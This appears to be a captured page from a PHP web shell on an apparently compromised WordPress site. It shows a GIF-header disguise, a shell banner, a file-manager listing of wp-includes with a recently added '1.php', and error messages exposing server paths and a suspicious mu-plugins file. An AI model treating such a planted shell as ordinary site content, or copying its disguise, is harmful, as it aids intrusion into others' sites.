GIF89a php 4983
Warning: session_start(): Session cannot be started after headers have already been sent in /tmp/sess_5171fcbf42bcab65758aae7e9218e28b.php on line 2
~NAXC~
FILE DIR
Name Size Owner/Group Last Modified Permission Action
ID3 --- alhakeem/alhakeem May 08 2026 10:15:25 0755
IXR --- alhakeem/alhakeem May 08 2026 10:15:25 0755
PHPMailer --- alhakeem/alhakeem May 08 2026 10:15:25 0755
Requests --- alhakeem/alhakeem May 08 2026 10:15:25 0755
SimplePie --- alhakeem/alhakeem May 08 2026 10:15:25 0755
Text --- alhakeem/alhakeem May 08 2026 10:15:25 0755
abilities-api --- alhakeem/alhakeem May 08 2026 10:15:25 0755
assets --- alhakeem/alhakeem May 08 2026 10:15:25 0755
block-bindings --- alhakeem/alhakeem May 08 2026 10:15:25 0755
block-patterns --- alhakeem/alhakeem May 08 2026 10:15:25 0755
block-supports --- alhakeem/alhakeem May 08 2026 10:15:25 0755
blocks --- alhakeem/alhakeem May 08 2026 10:15:25 0755
certificates --- alhakeem/alhakeem May 08 2026 10:15:25 0755
css --- alhakeem/alhakeem May 08 2026 10:15:25 0755
customize --- alhakeem/alhakeem May 08 2026 10:15:25 0755
fonts --- alhakeem/alhakeem May 08 2026 10:15:25 0755
html-api --- alhakeem/alhakeem May 08 2026 10:15:25 0755
images --- alhakeem/alhakeem May 08 2026 10:15:25 0755
interactivity-api --- alhakeem/alhakeem May 08 2026 10:15:25 0755
js --- alhakeem/alhakeem May 08 2026 10:15:25 0755
l10n --- alhakeem/alhakeem May 08 2026 10:15:25 0755
php-compat --- alhakeem/alhakeem May 08 2026 10:15:25 0755
pomo --- alhakeem/alhakeem May 08 2026 10:15:25 0755
rest-api --- alhakeem/alhakeem May 08 2026 10:15:25 0755
sitemaps --- alhakeem/alhakeem May 08 2026 10:15:25 0755
sodium_compat --- alhakeem/alhakeem May 08 2026 10:15:25 0755
style-engine --- alhakeem/alhakeem May 08 2026 10:15:25 0755
theme-compat --- alhakeem/alhakeem May 08 2026 10:15:25 0755
widgets --- alhakeem/alhakeem May 08 2026 10:15:25 0755
1.php 8180 bytes alhakeem/alhakeem May 08 2026 10:14:26 0644
abilities-api.php 24369 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
abilities.php 7983 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
admin-bar.php 36966 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
atomlib.php 12181 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
author-template.php 19391 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
block-bindings.php 7526 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
block-editor.php 29282 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
block-i18n.json 316 bytes alhakeem/alhakeem January 26 2022 1:37:32 0644
block-patterns.php 13213 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
block-template-utils.php 62484 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
block-template.php 15359 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
blocks.php 114739 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
bookmark-template.php 12768 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
bookmark.php 15427 bytes alhakeem/alhakeem July 17 2024 1:45:10 0644
cache-compat.php 10078 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
cache.php 13486 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
canonical.php 34645 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
capabilities.php 43652 bytes alhakeem/alhakeem February 04 2026 1:44:54 0644
category-template.php 57045 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
category.php 12829 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
class-IXR.php 2616 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
class-avif-info.php 29615 bytes alhakeem/alhakeem May 08 2024 1:39:09 0644
class-feed.php 539 bytes alhakeem/alhakeem November 13 2024 9:31:32 0644
class-http.php 367 bytes alhakeem/alhakeem November 02 2022 1:41:27 0644
class-json.php 43676 bytes alhakeem/alhakeem December 03 2025 1:42:16 0644
class-oembed.php 401 bytes alhakeem/alhakeem November 02 2022 1:41:27 0644
class-phpass.php 6771 bytes alhakeem/alhakeem November 13 2024 9:31:32 0644
class-phpmailer.php 664 bytes alhakeem/alhakeem August 12 2020 1:55:38 0644
class-pop3.php 21121 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
class-requests.php 2237 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-simplepie.php 453 bytes alhakeem/alhakeem November 13 2024 9:31:32 0644
class-smtp.php 457 bytes alhakeem/alhakeem March 10 2021 1:43:52 0644
class-snoopy.php 37715 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-walker-category-dropdown.php 2469 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-walker-category.php 8477 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-walker-comment.php 14221 bytes alhakeem/alhakeem July 17 2024 1:45:10 0644
class-walker-nav-menu.php 12044 bytes alhakeem/alhakeem April 16 2025 4:00:23 0644
class-walker-page-dropdown.php 2710 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-walker-page.php 7612 bytes alhakeem/alhakeem December 10 2023 1:42:14 0644
class-wp-admin-bar.php 17874 bytes alhakeem/alhakeem July 24 2024 1:58:14 0644

Fatal error: Cannot redeclare __() (previously declared in /home3/alhakeem/public_html/wp-includes/l10n.php:306) in /home3/alhakeem/public_html/wp-content/mu-plugins/rh.php on line 83